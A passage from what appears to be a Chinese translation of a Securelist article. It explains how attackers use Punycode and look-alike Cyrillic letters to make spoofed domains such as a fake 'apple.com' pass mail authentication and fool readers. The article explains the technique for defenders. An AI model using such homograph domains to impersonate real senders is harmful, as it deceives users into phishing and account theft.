转换为:

xn--80akjebc7ajgd.xn--p1ai

但在浏览器中,你很可能会看到相同的касперский.рф。由于该技术提供部分编码(对单个字符进行编码,而不是对整个字符串进行编码),因此域可以同时包含ASCII和Unicode字符,网络犯罪分子会积极利用这种特性。

电子邮件欺诈:攻击者如何冒充合法发件人

Unicode欺骗的电子邮件示例

在上面的截图中,消息据称是从apple.com发送的。它看起来合法,并且电子邮件也通过了邮件身份验证。仔细看可以看出,邮件设计得正规苹果支持页面并不一样,但普通用户很少会去比较。如果毫无戒心的用户点击该链接,就会被带到一个虚假网站,要求提供帐户详细信息。

看一看邮件头(可在大多数PC邮件客户端或web版本的邮件服务中看到),就会看到完全不同的画面:

电子邮件欺诈:攻击者如何冒充合法发件人

Punycode域记录

我们上面看到的apple.com域在Punycode中看起来非常不同,因为前三个字符实际上是西里尔字母“а”和“р”。但是为了方便用户,邮件客户端将Punycode转换为Unicode,于是消息显示为“apple.com”。

需要注意的是,一些邮件客户端会警告用户域名中使用的非标准字符,甚至在From标头中显示Punycode,然而这种保护机制并不普遍。

结论

邮件诈骗有多种方法,其中一些看起来很原始但能成功绕过邮件身份验证。同时,邮件欺诈往往只是犯罪分子攻击的第一步,对受害者信息的收集,或对受害者设备的控制可能会造成更深远的影响,即使只是一次点击,也可能导致身份盗用、业务宕机,或高达数百万美元的金钱损失。

本文翻译自:https://securelist.com/email-spoofing-types/102703/